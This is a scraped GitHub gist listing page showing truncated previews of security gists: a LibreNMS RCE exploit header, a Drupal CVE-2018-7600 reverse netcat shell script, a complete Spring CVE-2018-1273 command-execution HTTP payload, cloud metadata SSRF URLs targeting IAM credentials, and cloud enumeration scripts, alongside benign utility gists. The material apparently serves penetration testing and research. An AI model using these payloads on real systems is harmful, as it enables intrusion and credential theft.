Skip to content

Instantly share code, notes, and snippets.

💭
Hacking!

Robbie random-robbie

💭
Hacking!
Block or report user

Report or block random-robbie

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View wpeprivate-config.sh
#!/bin/bash
# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
# If it "no worked" (Technical Term) then you probably need to install jq!
TARGET=$1
TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3)
# Pretty Colors
RESET='\033[00m'
GREEN='\033[01;32m'
@carnal0wnage
carnal0wnage / gcp_enum.sh
Last active Apr 26, 2019
use the gcloud utilities to enumerate as much access as possible from a GCP service account json file. see blog post: <to insert>
View gcp_enum.sh
# gcloud auth activate-service-account --key-file=85.json
# gcloud projects list
project="my-projet"
space=""
echo "gcloud auth list"
gcloud auth list
echo -e "$space"
View librenms-exploit.py
#!/usr/bin/python
'''
# Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution
# Date: 24/12/2018
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2018-20434
# Vendor Homepage: https://www.librenms.org/
# Version: v1.46
# Tested on: Ubuntu 18.04 / PHP 7.2.10
@fransr
fransr / bucket-disclose.sh
Last active Jul 7, 2019
Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages
View bucket-disclose.sh
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
@g0tmi1k
g0tmi1k / drupalgeddon2_CVE-2018-7600_SA-CORE-2018-002.md
Last active Jun 10, 2019
drupalgeddon2 / SA-CORE-2018-002 / CVE-2018-7600 cURL (PoC)
View drupalgeddon2_CVE-2018-7600_SA-CORE-2018-002.md
@AlbinoDrought
AlbinoDrought / drupal-reverse-shell.sh
Created Apr 12, 2018
Drupal CVE-2018-7600 PoC - reverse netcat shell ;)
View drupal-reverse-shell.sh
#!/bin/sh
YOUR_EXTERNAL_IP="172.16.30.108"
YOUR_NETCAT_PORT="6969"
# Start up a netcat server
# netcat -l 6969
HOST="http://drupal.docker.localhost:8000"
PHP_FUNCTION="exec"
View CVE-2018-1273.http
POST /users HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf
@jhaddix
jhaddix / cloud_metadata.txt
Last active Aug 18, 2019 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@oldo
oldo / video-metada-finder.py
Last active Jul 29, 2019
A python function utilising `ffprobe` to find any metadata related to a video file. Examples of what it can find include bitrate, fps, codec details, duration and many more. This gist returns the video height and width as an example.
View video-metada-finder.py
#!/usr/local/bin/python3
import subprocess
import shlex
import json
# function to find the resolution of the input video file
def findVideoMetada(pathToInputVideo):
cmd = "ffprobe -v quiet -print_format json -show_streams"
args = shlex.split(cmd)
args.append(pathToInputVideo)
View Linux-Tor-Install.md
  • 7zip
    • p7zip
    • p7zip-full
    • sudo apt-get install p7zip p7zip-full
  • nautilus
    • nautilus-open-terminal
    • sudo apt-get install nautilus-open-terminal
  • browsers
    • firefox
    • chromium-browser
You can’t perform that action at this time.